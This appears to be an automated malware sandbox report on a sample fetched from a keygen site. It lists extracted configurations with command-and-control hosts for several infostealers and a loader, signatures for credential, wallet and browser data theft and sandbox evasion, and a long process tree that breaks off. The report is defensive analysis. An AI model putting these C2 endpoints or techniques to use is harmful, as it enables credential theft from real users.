Resubmissions

22-04-2021 16:45

210422-k9xv9nxcbx 10

21-04-2021 17:01

210421-pl1rqeqs7n 10

21-04-2021 12:53

210421-gkr26l4mvs 10

20-04-2021 19:55

210420-nex8ep6zhj 10

20-04-2021 15:03

210420-v63pp18knj 10

Analysis

  • max time kernel
    1800s
  • max time network
    1798s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-04-2021 15:03

General

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

smokeloader

Version

2020

C2

http://venosur.top/

http://nabudar.top/

rc4.i32
rc4.i32

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 53 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 27 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 48 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1376
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1952
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2432
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8550ceeb125094q2480.html
          1⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:852
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffaa24f4f50,0x7ffaa24f4f60,0x7ffaa24f4f70
            2⤵
              PID:2368
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1504 /prefetch:2
              2⤵
                PID:3188
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3756
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 /prefetch:8
                2⤵
                  PID:2236
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
                  2⤵
                    PID:3856
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2932 /prefetch:1
                    2⤵
                      PID:3860
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
                      2⤵
                        PID:3748
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
                        2⤵
                          PID:3824
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
                          2⤵
                            PID:3620
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
                            2⤵
                              PID:2084
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3736 /prefetch:8
                              2⤵
                                PID:4224
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4672
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6164 /prefetch:8
                                2⤵
                                  PID:4792
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:8
                                  2⤵
                                    PID:4820
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6296 /prefetch:8
                                    2⤵
                                      PID:4864
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6464 /prefetch:8
                                      2⤵
                                        PID:4924
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6312 /prefetch:8
                                        2⤵
                                          PID:4936
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6284 /prefetch:8
                                          2⤵
                                            PID:4996
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:8
                                            2⤵
                                              PID:5008
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6148 /prefetch:8
                                              2⤵
                                                PID:5044
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6740 /prefetch:8
                                                2⤵
                                                  PID:5080
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                  2⤵
                                                    PID:4112
                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff79760a890,0x7ff79760a8a0,0x7ff79760a8b0
                                                      3⤵
                                                        PID:4204
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2280
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5496 /prefetch:8
                                                      2⤵
                                                        PID:2220
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:8
                                                        2⤵
                                                          PID:4368
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6884 /prefetch:8
                                                          2⤵
                                                            PID:4228
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
                                                            2⤵
                                                              PID:4460
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6492 /prefetch:8
                                                              2⤵
                                                                PID:4424
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6348 /prefetch:8
                                                                2⤵
                                                                  PID:1156
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:8
                                                                  2⤵
                                                                    PID:1264
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6356 /prefetch:8
                                                                    2⤵
                                                                      PID:4704
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6368 /prefetch:8
                                                                      2⤵
                                                                        PID:4828
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
                                                                        2⤵
                                                                          PID:4884
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6532 /prefetch:8
                                                                          2⤵
                                                                            PID:5032
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6676 /prefetch:8
                                                                            2⤵
                                                                              PID:5088
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7296 /prefetch:8
                                                                              2⤵
                                                                                PID:5028
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7280 /prefetch:8
                                                                                2⤵
                                                                                  PID:4936
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7556 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4116
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7684 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4308
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7660 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4724
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4768
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7932 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4648
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7948 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4620
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7964 /prefetch:8
                                                                                              2⤵
                                                                                                PID:5012
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7976 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4524
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7988 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4968
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8000 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2976
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8012 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4720
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7920 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4772
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4080 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:2144
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7972 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:184
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6936 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4804
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:4900
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:4856
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5024
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6344 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4432
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4132
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7576 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:3824
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:4380
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:4772
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5088 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:4660
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1412,6057573415712090577,9875859427921475670,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7468 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:4164
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                            1⤵
                                                                                                                              PID:2840
                                                                                                                            • c:\windows\system32\svchost.exe
